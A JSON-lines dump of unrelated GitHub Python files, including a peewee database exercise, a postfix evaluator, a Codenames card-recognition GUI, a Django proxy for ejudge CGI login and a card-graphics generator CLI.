[\n {'None':[None]}, # None\n {'None':[None]}, # Robust\n {'None':[None]}, # MinMax\n {'None':[None]}, # MaxAbs\n {'None':[None]}, # StandardScaler\n ]\n\nscaler = parameter_iterator(scaler,scaler_params)\n\nname_scaler = [str(i) for i in scaler]\n\n# <------------------------------ DISTRIBUTION ------------------------------> #\n\ndistribution = ['passthrough',QuantileTransformer(output_distribution='normal'),PowerTransformer()]\n\ndistribution_params = [\n {'None':[None]}, # passthroug\n {'None':[None]}, # Quantile\n {'None':[None]} # Power\n ]\n\ndistribution = parameter_iterator(distribution,distribution_params)\n\nname_distribution = [str(i) for i in distribution]\n\n# <------------------------------- PREDICTOR --------------------------------> #\n\nname_estimator = ['LinearRegression']\n\nestimator = [LinearRegression()]\n\nestimator_params = [\n {} # LogisticRegression\n ]\n# <--------------------------------------------------------------------------> #\n\nbeta_preprocessing(X_preprocessed_1, y_preprocessed_1,name_outlier,outlier,\n name_num_cat_feature,num_cat_feature,\n name_numerical_feature,numerical_feature,\n name_categorical_feature,categorical_feature,\n name_distribution,distribution,\n name_scaler,scaler,\n name_estimator,estimator,estimator_params,\n numerical_data,categorical_data,3,return_best=False)\n \n\n","repo_name":"Exlonk/PHYMOL","sub_path":"preprocessing_pipeline.py","file_name":"preprocessing_pipeline.py","file_ext":"py","file_size_in_byte":37175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23594130698","text":"\"\"\"Lesson07activity - Create a department table for the db and query the db.\n\nIn this exercise, based on instructor-provided code, a very simply\nHR-like database is created.\nThe db contains 3 tables:\n person (PK: person name)\n job (PK: job name; FK: person name)\n department (no PK 'cos no unique fields; FK: job name)\n\nFrom Activity description: \"Finally, produce a list using pretty print that\nshows all of the departments a person worked in for every job they ever had.\"\n\nIn this exercise, I wrote pprint_depts.py and populate_debt_db.py\nand modified personjobdept_model.py.\n\"\"\"\nimport peewee\n\nfrom RDBMS.personjobdept_model import Person, Job, Department\nfrom RDBMS.populate_person_db import populate_db as populate_people\nfrom RDBMS.populate_job_db import populate_db as populate_jobs\nfrom RDBMS.populate_dept_db import populate_db as populate_departments\n\n# Populate the databe\npopulate_people()\npopulate_jobs()\npopulate_departments()\n\n\ndef pretty_print_person_job_dept(query):\n \"\"\"Print a list using a query from the db in about the following format.\n\n Person_1\n worked as Title_1 at Department_1 for XX days\n worked as Title_2 at Department_1 for XX days\n Person_2\n had no jobs\n \"\"\"\n print('\\n')\n for person in query:\n print(person.person_name)\n if len(person.was_filled_by) > 0:\n for job in person.was_filled_by:\n print(f' worked as {job.job_name}', end=' ')\n for dept in job.job_held_at:\n print(f'at {dept.dept_name} for {dept.days_in_job} days')\n else:\n print(' had no jobs')\n print('\\n')\n\n# QUERY 1: using prefetch() - all people, with or w/out jobs\npeople = Person.select().order_by(Person.person_name)\npositions = Job.select().order_by(Job.job_name)\norg_units = Department.select().order_by(Department.dept_name)\nquery1 = peewee.prefetch(people, positions, org_units)\n\n# QUERY 2: using join() - only people with jobs are included\nquery2 = (Person\n .select(Person, Job, Department)\n .join(Job)\n .join(Department)\n .group_by(Person)\n .order_by(Person.person_name)\n )\n\n# QUERY 3: using join() - all people are included with JOIN.LEFT_OUTER\nquery3 = (Person\n .select(Person, Job, Department)\n .join(Job, peewee.JOIN.LEFT_OUTER)\n .join(Department, peewee.JOIN.LEFT_OUTER)\n .group_by(Person)\n .order_by(Person.person_name)\n )\n\nfor query in (query1, query2, query3):\n pretty_print_person_job_dept(query)\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/alex_skrn/Lesson07Activity/pprint_depts.py","file_name":"pprint_depts.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25744269378","text":"n = int(input(\"please input your desire number:\"))\r\nx = n\r\ntotal = 0\r\nfor i in range(1, n+1):\r\n if n % i == 0:\r\n\r\n if i == n:\r\n continue\r\n total = total + i\r\nif total == x:\r\n print(n, \"is a perfect number\")\r\nelse:\r\n print(n, \"is not a perfect number\")\r\n\r\n\r\n","repo_name":"Sabbirbracu/Assignment-02","sub_path":"Task 14.py","file_name":"Task 14.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39710230114","text":"from src.writer import writer\n\ndef func():\n\tprocessor = writer()\n\treturn processor.write(0, \"test\")\n\ndef test_answer():\n\tif func() == \"write 0 bank1 test\":\n\t\tif len(func()) == 18:\n\t\t\tassert True\n\t\t\treturn\n\tassert False","repo_name":"Just-a-Unity-Dev/david","sub_path":"tests/test_returns.py","file_name":"test_returns.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23845567750","text":"import Stack_pfix as st\r\npfix=st.stack()\r\nexp=list(input('Please Enter a Post Fix Expression \\n'))\r\n\r\nfor i in range(len(exp)-1):\r\n if (exp[i] == '1') or (exp[i] =='2') or (exp[i] =='3') or (exp[i] =='4') or (exp[i] =='5') or (exp[i] =='6') or (exp[i] =='7') or (exp[i] =='8') or (exp[i] =='9') or (exp[i] =='0'):\r\n pfix.push(int(exp[i]))\r\n elif (exp[i]=='+'):\r\n num1=pfix.pop()\r\n num2=pfix.pop()\r\n num3=num1+num2\r\n pfix.push(num3)\r\n elif (exp[i]=='-'):\r\n num1=pfix.pop()\r\n num2=pfix.pop()\r\n num3=num2-num1\r\n pfix.push(num3)\r\n elif (exp[i]=='*'):\r\n num1=pfix.pop()\r\n num2=pfix.pop()\r\n num3=num1*num2\r\n pfix.push(num3)\r\n elif (exp[i]=='/'):\r\n num1=pfix.pop()\r\n num2=pfix.pop()\r\n num3=num2/num1\r\n pfix.push(num3)\r\n\r\npfix.pop()\r\nprint('The Result is ')\r\npfix.PrintStack()\r\n \r\n\r\n\r\n","repo_name":"RishirajCharan/Python-Data-Structure-Implementation","sub_path":"teststack.py","file_name":"teststack.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70909094189","text":"import numpy as np\r\nimport tkinter as tk\r\n\r\nfrom gamecomponents.Card import Card, Team\r\nfrom globalvariables import GRID_SIZE, BOX_WIDTH_RATIO\r\nfrom imageprocessing.Segmenter import Segmenter\r\n\r\nGrid = np.array\r\n\r\n\r\nclass CodenamesGUI:\r\n def __init__(self, team: Team = Team.RED):\r\n self.team: Team = team\r\n self.risk: int = 5\r\n self.gameOver: bool = False\r\n self.keycardImagePath: str = \"keycard.jpg\"\r\n self.wordgridImagePath: str = \"wordgrid.jpg\"\r\n\r\n def captureKeycard(self) -> str:\r\n CodenamesGUI.__captureWithOverlay(self.keycardImagePath, 1, 1)\r\n return self.keycardImagePath\r\n\r\n def verifyKeycard(self, cardGrid: Grid) -> Team:\r\n window = tk.Tk()\r\n for row in range(GRID_SIZE):\r\n for col in range(GRID_SIZE):\r\n card: Card = cardGrid[row, col]\r\n bg: str = CodenamesGUI.__getColor(card.team)\r\n button: tk.Button = tk.Button(master=window, width=8, height=3, bg=bg)\r\n button.bind(\"<Button-1>\", lambda event, c=card: CodenamesGUI.__changeTeam(event, c))\r\n button.grid(row=row, column=col, sticky=\"wens\")\r\n\r\n # My team button\r\n bg = CodenamesGUI.__getColor(self.team)\r\n button = tk.Button(master=window, width=8, height=3, bg=bg, text=\"My team\")\r\n button.bind(\"<Button-1>\", self.__changeMyTeam)\r\n button.grid(row=GRID_SIZE, column=1, sticky=\"wens\")\r\n\r\n # Submit button\r\n button = tk.Button(master=window, width=8, height=3, text=\"Submit\")\r\n button.bind(\"<Button-1>\", CodenamesGUI.__close)\r\n button.grid(row=GRID_SIZE, column=GRID_SIZE - 2, sticky=\"wens\")\r\n\r\n window.mainloop()\r\n return self.team\r\n\r\n def captureWordgrid(self) -> str:\r\n CodenamesGUI.__captureWithOverlay(self.wordgridImagePath, BOX_WIDTH_RATIO, 1)\r\n return self.wordgridImagePath\r\n\r\n def verifyWordgrid(self, cardGrid: Grid) -> int:\r\n window = tk.Tk()\r\n entries: Grid = Grid([[tk.Entry() for col in range(GRID_SIZE)] for row in range(GRID_SIZE)], dtype=tk.Entry)\r\n\r\n for row in range(GRID_SIZE):\r\n for col in range(GRID_SIZE):\r\n entries[row, col] = tk.Entry(master=window)\r\n entries[row, col].insert(0, cardGrid[row, col].text)\r\n entries[row, col].grid(row=row, column=col)\r\n\r\n label: tk.Label = tk.Label(master=window, text=\"Risk (-9 - 10+)\")\r\n label.grid(row=GRID_SIZE, column=0)\r\n entry: tk.Entry = tk.Entry(master=window)\r\n entry.insert(0, self.risk)\r\n entry.grid(row=GRID_SIZE, column=1)\r\n\r\n button: tk.Button = tk.Button(master=window, text=\"Submit\")\r\n button.bind(\"<Button-1>\", lambda event: self.__changeText(event, entries, entry, cardGrid))\r\n button.grid(row=GRID_SIZE, column=2, columnspan=GRID_SIZE - 2, sticky=\"wens\")\r\n window.mainloop()\r\n return self.risk\r\n\r\n def displayClueAndWait(self, clue: str) -> bool:\r\n window = tk.Tk()\r\n self.gameOver = False\r\n\r\n clueLabel: tk.Label = tk.Label(master=window, text=clue, font=(\"Helvetica\", 24))\r\n clueLabel.grid(row=0, column=0, columnspan=2, sticky=\"wens\")\r\n\r\n continueButton: tk.Button = tk.Button(master=window, text=\"Start next turn\")\r\n continueButton.grid(row=1, column=0)\r\n continueButton.bind(\"<Button-1>\", CodenamesGUI.__close)\r\n\r\n endButton: tk.Button = tk.Button(master=window, text=\"End game\")\r\n endButton.grid(row=1, column=1)\r\n endButton.bind(\"<Button-1>\", self.__endGame)\r\n\r\n window.mainloop()\r\n return self.gameOver\r\n\r\n # ========== PRIVATE ========== #\r\n @staticmethod\r\n def __captureWithOverlay(name: str, widthRatio: float, heightRatio: float):\r\n from picamera import PiCamera\r\n with PiCamera() as camera:\r\n x: int = 64\r\n y: int = 0\r\n width: int = 800\r\n height: int = 480\r\n overlay: np.array = Segmenter.iterateBoxes(width, height, widthRatio, heightRatio,\r\n Segmenter.generateOverlay)\r\n\r\n camera.start_preview(fullscreen=False, window=(x, y, width, height))\r\n cameraOverlay = camera.add_overlay(overlay, format='rgb', layer=3, alpha=128, fullscreen=False,\r\n window=(x, y, width, height))\r\n\r\n window = tk.Tk()\r\n window.geometry(\"64x480+0-1\")\r\n captureButton: tk.Button = tk.Button(master=window, text=\"C\\na\\np\\nt\\nu\\nr\\ne\", width=4, height=26)\r\n captureButton.grid(row=0, column=0, sticky=\"nesw\")\r\n captureButton.bind(\"<Button-1>\", CodenamesGUI.__close)\r\n window.mainloop()\r\n\r\n camera.capture(name, use_video_port=True)\r\n camera.remove_overlay(cameraOverlay)\r\n camera.stop_preview()\r\n\r\n @staticmethod\r\n def __getColor(team: Team) -> str:\r\n if team == Team.ASSASSIN:\r\n return \"gray10\"\r\n elif team == Team.BLUE:\r\n return \"dodger blue\"\r\n elif team == Team.RED:\r\n return \"firebrick1\"\r\n elif team == Team.NEUTRAL:\r\n return \"bisque\"\r\n\r\n @staticmethod\r\n def __changeTeam(event: tk.EventType, card: Card):\r\n newTeam: int = int(card.team) + 1\r\n if newTeam > 3:\r\n newTeam = 0\r\n card.team = Team(newTeam)\r\n newBg: str = CodenamesGUI.__getColor(card.team)\r\n event.widget.configure(bg=newBg)\r\n\r\n def __changeMyTeam(self, event: tk.EventType):\r\n self.team = Team.RED if self.team is Team.BLUE else Team.BLUE\r\n newBg: str = CodenamesGUI.__getColor(self.team)\r\n event.widget.configure(bg=newBg)\r\n\r\n @staticmethod\r\n def __close(event: tk.EventType):\r\n event.widget.master.destroy()\r\n\r\n def __changeText(self, event: tk.EventType, entries: Grid, entry: tk.Entry, cardGrid: Grid):\r\n for row in range(GRID_SIZE):\r\n for col in range(GRID_SIZE):\r\n text: str = entries[row, col].get().strip().replace(\" \", \"_\")\r\n cardGrid[row, col].text = text\r\n cardGrid[row, col].visible = bool(text)\r\n self.risk = int(entry.get())\r\n CodenamesGUI.__close(event)\r\n\r\n def __endGame(self, event: tk.EventType):\r\n self.gameOver = True\r\n CodenamesGUI.__close(event)\r\n","repo_name":"kyledpierson/codenames-spymaster","sub_path":"iomanager/CodenamesGUI.py","file_name":"CodenamesGUI.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74489687788","text":"import io\nimport subprocess\nimport urllib.parse\nimport lxml.etree\nimport re\n\nfrom django.http import HttpResponse\n\nCGI_ROOT = \"/opt/ejudge/libexec/ejudge/cgi-bin\"\n\ndef _runcgi(request, handle, method=\"GET\", **query_params):\n query_string = urllib.parse.urlencode(query_params)\n env = {\n \"REMOTE_ADDR\": request.META[\"REMOTE_ADDR\"],\n \"HTTP_HOST\": request.META[\"HTTP_HOST\"],\n \"SCRIPT_NAME\": f\"/cgi-bin/{handle}\",\n \"REQUEST_METHOD\": method\n }\n if request.scheme == \"https\":\n env[\"HTTPS\"] = \"yes\"\n if \"EJSID\" in request.COOKIES:\n env[\"HTTP_COOKIE\"] = f\"EJSID={request.COOKIES['EJSID']}\"\n\n if method == \"POST\":\n stdin = query_string\n env[\"CONTENT_LENGTH\"] = str(len(stdin))\n env[\"CONTENT_TYPE\"] = \"application/x-www-form-urlencoded\"\n else:\n env[\"QUERY_STRING\"] = query_string\n stdin = None\n\n result = subprocess.run(\n f\"{CGI_ROOT}/{handle}\",\n input=stdin,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n check=True,\n encoding=\"utf-8\",\n env=env\n )\n\n hdr = {}\n body = io.StringIO()\n mode = \"header\"\n for line in result.stdout.split(\"\\n\"):\n if line.strip() == \"\" and mode == \"header\":\n mode = \"body\"\n elif mode == \"header\":\n k, v = line.split(\": \")\n hdr[k] = v\n else:\n print(line, file=body)\n\n return (hdr, lxml.etree.fromstring(body.getvalue(), lxml.etree.HTMLParser()))\n\n\ndef _xpath(html, xp):\n elem = html.xpath(xp)\n return elem[0] if len(elem) else None\n\n\ndef _breakdown_url(url):\n return dict(urllib.parse.parse_qsl(urllib.parse.urlparse(url).query))\n\n\n_postprocessors = []\n\ndef postprocessor(fn):\n _postprocessors.append(fn)\n return fn\n\ndef forward(request, handle, method=\"GET\", **query_params):\n _, content = _runcgi(request, handle, method, **query_params)\n for fn in _postprocessors:\n fn(request, content)\n return HttpResponse(lxml.etree.tostring(content))\n\n\ndef login(request, login, password):\n \"\"\"Logs in to ejudge serve-control.\n Returns a pair (SID, cookie) on successful login, or (None, None) otherwise.\n \"\"\"\n hdrs, resp = _runcgi(request, \"serve-control\", method=\"POST\", login=login, password=password)\n if _xpath(resp, \"//title/text()\") == \"Invalid login\":\n return (None, None)\n else:\n sid = _breakdown_url(hdrs[\"Location\"])[\"SID\"]\n m = re.match(\"EJSID=([0-9a-f]+)(;.*)?$\", hdrs[\"Set-Cookie\"])\n assert m is not None\n print(f\"SID={sid}, cookie={m.group(1)}\")\n return (sid, m.group(1))\n\n\ndef srvctl_sid(request):\n sid = request.session.get(\"ej_master_sid\", \"\")\n if not sid:\n return None\n\n _, resp = _runcgi(request, \"serve-control\", SID=sid)\n return sid if _xpath(resp, \"//input[@name='login']\") is None else None\n\n\ndef contest_sid_valid(request, sid):\n \"\"\"Checks if contest-local SID is still valid for current session.\"\"\"\n _, resp = _runcgi(request, \"new-master\", SID=sid)\n title = _xpath(resp, \"//title\")\n return not title.text.endswith(\"Invalid session\")\n\n\ndef contest_login(request, contest_id):\n \"\"\"Generates a contest-local SID for a contest.\"\"\"\n sid = srvctl_sid(request)\n hdrs, resp = _runcgi(request, \"new-master\", SID=sid, action=3, contest_id=contest_id)\n if \"Location\" not in hdrs:\n if _xpath(resp, \"//title\").text.endswith(\"Permission denied\"):\n return None\n raise RuntimeError(\"something went wrong\")\n return _breakdown_url(hdrs[\"Location\"])[\"SID\"]\n","repo_name":"dprokoptsev/ejproxy","sub_path":"ejproxy/ejudge.py","file_name":"ejudge.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40302818215","text":"import argparse\nimport ast\nimport os\nimport glob\nimport logging\nimport re\nimport subprocess\nimport math\n\nimport cbg.content.deck\nimport cbg.sample.size\nimport cbg.layout\n\n\nclass Application():\n '''A template for a CBG console application.\n\n Some features of this template use a variety of external programs\n with little regard to their availability, which means that portability\n is limited. Tested on Ubuntu GNOME with appropriate extras.\n\n '''\n\n # Default raster resolution is the capacity of an HP LaserJet 1010.\n default_dpi = 600\n\n class ExternalError(Exception):\n '''Raised when a subprocess cannot be called, or fails.'''\n pass\n\n def __init__(self, name_full, decks, name_short=None,\n folder_specs='specs', folder_svg='svg', folder_png='png'):\n '''Constructor.\n\n The \"decks\" argument is expected to refer to a dictionary of\n card type classes indexed by file name strings, like this:\n\n {'example': cbg.content.card.Card}\n\n Note there is no path or suffix in the file name string.\n\n '''\n self.name_full = name_full\n self.decks = decks\n\n self.name_short = name_short\n if not self.name_short:\n # Default to initials.\n s = ''.join((w[0].lower() for w in self.name_full.split()))\n self.name_short = s\n\n self.folder_specs = folder_specs\n self.folder_svg = folder_svg\n self.folder_png = folder_png\n\n self.args = self.check_cli(self.make_cli())\n self.configure_logging()\n\n def make_cli(self):\n '''Create, but do not run, a command-line argument parser.'''\n\n d = 'Generate playing card graphics for {}.'.format(self.name_full)\n e = ('Syntax for card selection: [AMOUNT:][tag=]REGEX',\n 'AMOUNT defaults to no change (whitelist) or zero (blacklist).',\n 'REGEX with \"tag=\" refers to one card tag, else titles.',\n '',\n 'This card graphics application was made with the CBG library.',\n 'CBG Copyright 2014-2016 Viktor Eikman',\n 'CBG is free software, and you are welcome to redistribute it',\n 'under the terms of the GNU General Public License.')\n\n f = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(description=d, epilog='\\n'.join(e),\n formatter_class=f)\n\n self._add_general_cli_opts(parser)\n self._add_selection_opts(parser)\n self._add_media_opts(parser)\n self._add_layouting_mode_opts(parser)\n\n return parser\n\n def _add_general_cli_opts(self, parser):\n '''Add general options to an argument parser.\n\n These fall under the standard argparse heading \"optional arguments\",\n though all arguments to the application are optional. We could\n suppress -h/--help getting added directly to the parser, then add\n replacements for that flag in a named group, and then call\n parser.print_help() as directed by the replacement. Not worth it.\n\n '''\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-v', '--verbose', action='store_true',\n help='extra logging')\n group.add_argument('-q', '--quiet', action='store_true',\n help='less logging')\n\n s = 'do not include the obverse side of cards in layouting'\n parser.add_argument('--no-fronts', '--no-obverse',\n dest='include_obverse', default=True,\n action='store_false', help=s)\n s = ('include the reverse side of cards in layouting; '\n 'implicit in duplex and neighbour modes')\n parser.add_argument('-B', '--backs', '--reverse',\n dest='include_reverse', default=False,\n action='store_true', help=s)\n\n group = parser.add_mutually_exclusive_group()\n s = 'send output to printer through lp (GNU+Linux only)'\n group.add_argument('-p', '--print', action='store_true', help=s)\n s = 'list cards as serialized data on console'\n group.add_argument('--list-cards', default=False,\n action='store_true', help=s)\n s = 'list images as serialized data on console'\n group.add_argument('--list-images', default=False,\n action='store_true', help=s)\n\n # Using \"nargs='?'\" can create confusion with layouting mode\n # subparser names as subsequent arguments. So there's a simpler form.\n subgroup = group.add_mutually_exclusive_group()\n s = 'display output using eog or evince depending on rasterization'\n subgroup.add_argument('-d', '--display', '--view', default=False,\n action='store_true', help=s)\n s = 'call APP to display output'\n subgroup.add_argument('--viewer', dest='display', metavar='APP',\n nargs='?', const=True, help=s)\n\n s = 'include the title of the first depicted card in each filename'\n parser.add_argument('--card-in-filename', default=False,\n action='store_true', help=s)\n s = 'include the title of the first deck represented in each filename'\n parser.add_argument('--deck-in-filename', default=False,\n action='store_true', help=s)\n s = 'do not include the title of the game in each filename'\n parser.add_argument('--no-game-in-filename', dest='game_in_filename',\n default=True, action='store_false', help=s)\n s = 'an arbitrary suffix to each filename'\n parser.add_argument('--filename-suffix', default='', help=s)\n\n def _add_selection_opts(self, parser):\n '''Add deck/card filtering options to an argument parser.'''\n\n s = 'optional card selection arguments'\n selection = parser.add_argument_group(title=s)\n s = 'card selection blacklist entry'\n selection.add_argument('-b', '--blacklist', metavar='REGEX',\n default=[], action='append', help=s)\n s = 'card selection whitelist entry (applied before blacklist)'\n selection.add_argument('-w', '--whitelist', metavar='REGEX',\n default=[], action='append', help=s)\n s = 'maximum 1 copy of each card'\n selection.add_argument('-g', '--gallery', default=False,\n action='store_true', help=s)\n s = 'maximum 1 card per deck'\n selection.add_argument('--deck-sample', default=False,\n action='store_true', help=s)\n\n def _add_media_opts(self, parser):\n '''Add media options to an argument parser.'''\n\n product = parser.add_argument_group(title='optional media arguments')\n\n def nonnegative_int(value):\n '''Type-checking function for argparse.'''\n value = int(value)\n if value < 0:\n s = 'not a non-negative integer: {}'.format(value)\n raise argparse.ArgumentTypeError(s)\n return value\n\n group = product.add_mutually_exclusive_group()\n s = 'produce a document from SVG data, format inferred from filename'\n group.add_argument('--document', metavar='FILENAME', help=s)\n\n # As with --display, we provide an option for default DPI that cannot\n # be confused with subsequent arguments.\n subgroup = group.add_mutually_exclusive_group()\n s = 'bitmap output via Inkscape at {} DPI'.format(self.default_dpi)\n subgroup.add_argument('-r', '--rasterize', action='store_const',\n const=self.default_dpi, help=s)\n s = 'bitmap output via Inkscape at any resolution'\n subgroup.add_argument('--dpi', metavar='DPI', nargs='?',\n dest='rasterize', const=self.default_dpi,\n type=nonnegative_int, help=s)\n\n def numeric_2tuple(value):\n '''Type-checking function for argparse.'''\n if not re.match('^\\(.*\\)$', value):\n value = '({})'.format(value)\n\n try:\n value = ast.literal_eval(value)\n assert isinstance(value, tuple)\n assert len(value) == 2\n assert all(map(lambda x: isinstance(x, (int, float)),\n value))\n assert all(map(lambda x: x >= 0, value))\n except:\n s = 'not a numeric 2-tuple like \"0,0\": {}'.format(value)\n raise argparse.ArgumentTypeError(s)\n\n return value\n\n s = 'paper size for printing, as a string instruction to lp'\n product.add_argument('--print-size', metavar='PAPER_FORMAT',\n default='A4', help=s)\n s = 'exact image size, in mm'\n product.add_argument('--image-size', metavar='TUPLE',\n type=numeric_2tuple,\n default=cbg.sample.size.A4, help=s)\n s = 'image margins to the outermost spaces for card(s), in mm'\n product.add_argument('--margins', metavar='TUPLE', type=numeric_2tuple,\n default=cbg.sample.size.A4_MARGINS, help=s)\n\n def _add_layouting_mode_opts(self, parser):\n '''Add layouting options to an argument parser.'''\n\n def arc(value):\n '''Type-checking function for argparse.'''\n try:\n value = float(value)\n except:\n raise argparse.ArgumentTypeError('must be a number')\n\n if not -math.pi <= value <= math.pi:\n s = 'cannot exceed π radians (180°)'\n raise argparse.ArgumentTypeError(s)\n\n return value\n\n parser.set_defaults(layouter_cls=cbg.layout.Layouter,\n side_in_filename=False, arc=0)\n s = 'optional non-standard layouting modes'\n subparsers = parser.add_subparsers(dest='layouting', title=s,\n help='each takes its own help flag')\n\n s = 'Alternate between front sheets and back sheets.'\n duplex = subparsers.add_parser('duplex', description=s)\n duplex.set_defaults(layouter_cls=cbg.layout.Duplex,\n side_in_filename=True)\n s = 'Do not include the word \"obverse\" or \"reverse\" in each filename.'\n duplex.add_argument('--no-side-in-filename', dest='side_in-filename',\n default=True, action='store_false', help=s)\n\n s = 'Treat both sides of cards similarly.'\n neighbours = subparsers.add_parser('neighbours', description=s)\n neighbours.set_defaults(layouter_cls=cbg.layout.Neighbours)\n\n s = 'Draw cards in the shape of a hand fan, for display purposes.'\n fan = subparsers.add_parser('fan', description=s)\n fan.set_defaults(layouter_cls=cbg.layout.Fan)\n s = ('the angle the cards will span; the last card will be on the '\n 'right with a positive angle, else on the left')\n fan.add_argument('--arc', metavar='RADIANS', type=arc,\n default=0, help=s)\n\n s = 'Give each card its own image.'\n singles = subparsers.add_parser('singles', description=s)\n singles.set_defaults(layouter_cls=cbg.layout.Singles,\n card_in_filename=True)\n\n return parser\n\n def check_cli(self, parser):\n '''CLI argument parsing, sanity checks and repackaging.'''\n\n args = parser.parse_args()\n\n if not any((args.include_obverse, args.include_reverse)):\n parser.error('asked to process neither side of cards')\n\n if args.layouting == 'duplex' or args.layouting == 'neighbours':\n args.include_reverse = True\n if not args.include_obverse:\n s = 'layouting mode requires both sides of each card'\n parser.error(s)\n\n if args.print:\n # Rasterization is implied.\n if not args.rasterize:\n args.rasterize = self.default_dpi\n\n return args\n\n def configure_logging(self):\n if self.args.verbose:\n level = logging.DEBUG\n elif self.args.quiet:\n level = logging.WARNING\n else:\n level = logging.INFO\n\n logging.getLogger().setLevel(level)\n\n def execute(self):\n # Clean up after previous runs.\n self.delete_old_files(self.folder_svg)\n self.delete_old_files(self.folder_png)\n\n # Collect and sieve through deck specifications.\n decks = self.read_deck_specs()\n\n # Consider console output before generating SVG.\n if self.args.list_cards:\n presentation = dict()\n for deck in decks:\n presentation[deck.title] = {str(t): c for t, c in deck.items()}\n\n print(cbg.serialization.Serialization.dumps(presentation))\n return 0\n\n # Produce SVG, treat it and exit application appropriately.\n try:\n return self._output(self.vectorize(decks))\n except self.ExternalError as e:\n logging.error(str(e))\n return 1\n\n def _output(self, images):\n '''Consider showing on screen, printing etc.\n\n Return an exit status: 0 if successful, else a positive integer.\n\n '''\n\n if self.args.rasterize:\n logging.debug('Producing raster graphics.')\n try:\n os.mkdir(self.folder_png)\n except FileExistsError:\n logging.debug('Destination folder for PNG already exists.')\n\n for image in images:\n image.filepath = self.rasterize(image.filepath)\n\n elif self.args.document:\n filepath = self.args.document\n if filepath.lower().endswith('.pdf'):\n self.convert_to_pdf(filepath)\n else:\n s = 'Unrecognized output filename suffix.'\n logging.error(s)\n return 1\n\n if self.args.display:\n if self.args.document:\n filename = self.args.document\n viewer = 'evince'\n elif self.args.rasterize:\n filename = self.folder_png\n viewer = 'eog'\n else:\n filename = self.folder_svg\n viewer = 'eog'\n\n if isinstance(self.args.display, str):\n viewer = self.args.display\n\n self._external_process([viewer, filename])\n\n elif self.args.list_images:\n presentation = dict()\n for image in images:\n presentation[image.filename] = tuple(map(str, image.subjects))\n print(cbg.serialization.Serialization.dumps(presentation))\n\n elif self.args.print:\n self.print_output()\n\n return 0\n\n def _external_process(self, cmd):\n def log_output(text):\n for line in text.splitlines():\n logging.debug('Subprocess output: {}'.format(line))\n\n try:\n o = subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n except FileNotFoundError:\n s = 'External application \"{}\" not found.'\n raise self.ExternalError(s.format(cmd[0]))\n except subprocess.CalledProcessError as e:\n logging.debug('Call {} failed.'.format(cmd))\n log_output(e.output)\n s = 'External application \"{}\" terminated with error: {}.'\n raise self.ExternalError(s.format(cmd[0], e.returncode))\n else:\n logging.debug('Call {} succeeded.'.format(cmd))\n log_output(o)\n return o\n\n def delete_old_files(self, folder):\n '''Use globbing to get a valid relative path.'''\n for f in glob.glob(folder + '/*'):\n try:\n os.remove(f)\n logging.debug('Deleted \"{}\".'.format(f))\n except IsADirectoryError:\n # Directories are permitted to remain, on the assumption\n # that they are being used to house xlink'd raster graphics.\n pass\n\n def read_deck_specs(self):\n logging.debug('Reading specifications.')\n\n for filename_base, card_cls in self.decks.items():\n deck = cbg.content.deck.Deck(card_cls, directory=self.folder_specs,\n filename_base=filename_base)\n deck.control_selection(self.args.whitelist, self.args.blacklist,\n self.args.gallery, self.args.deck_sample)\n yield deck\n\n def vectorize(self, decks):\n '''Compose SVG images and save them.\n\n Take a generator or other iterable of deck objects.\n\n Return a layouter, which is a list of the images with some extra\n information attached.\n\n '''\n\n logging.debug('Producing vector graphics.')\n\n # Flatten specifications to a single list of cards for layouting.\n cards = sorted(card for deck in decks for card in deck.flat())\n\n try:\n os.mkdir(self.folder_svg)\n except FileExistsError:\n logging.debug('Destination folder for SVG already exists.')\n\n layouter = self.args.layouter_cls(cards,\n image_size=self.args.image_size,\n image_margins=self.args.margins,\n arc=self.args.arc)\n layouter.run(self.args.include_obverse, self.args.include_reverse)\n\n title_filename = self.name_short if self.args.game_in_filename else ''\n layouter.save(self.folder_svg,\n side=self.args.side_in_filename,\n card=self.args.card_in_filename,\n deck=self.args.deck_in_filename,\n game=title_filename,\n suffix=self.args.filename_suffix)\n\n return layouter\n\n def rasterize(self, svg_filepath):\n '''Go from vector graphics to a bitmap using Inkscape.'''\n dpi = self.args.rasterize or self.default_dpi\n logging.debug('Rasterizing {}.'.format(svg_filepath))\n basename = os.path.basename(svg_filepath).rpartition('.')[0]\n png_filename = '{}.png'.format(basename)\n png_filepath = os.path.join(self.folder_png, png_filename)\n cmd = ['inkscape', '-e', png_filepath, '-d', str(dpi), svg_filepath]\n self._external_process(cmd)\n return png_filepath\n\n def convert_to_pdf(self, filepath):\n '''Author a PDF with librsvg.'''\n\n logging.debug('Authoring PDF.')\n\n command = ['rsvg-convert', '-f', 'pdf', '-o', filepath]\n command.extend(self.all_svg_filepaths())\n self._external_process(command)\n\n def all_svg_filepaths(self):\n return sorted(glob.glob('{}/*.svg'.format(self.folder_svg)))\n\n def print_output(self):\n '''Print graphics from individual image files: one per page.\n\n lp prints SVG as text, not graphics. Hence we use the rasterized\n forms here.\n\n '''\n\n logging.debug('Printing.')\n\n for png in sorted(glob.glob('{}/*'.format(self.folder_png))):\n cmd = (['lp', '-o', 'media={}'.format(self.args.print_size), png])\n self._external_process(cmd)\n\n # Not sure the above operation gets the scale exactly right!\n # lp seems to like printing PNGs to fill the page.\n\n # Pre-2014, the following had to be done after Inkscape to get\n # the right scale. ImageMagick for PNG to PostScript:\n # $ 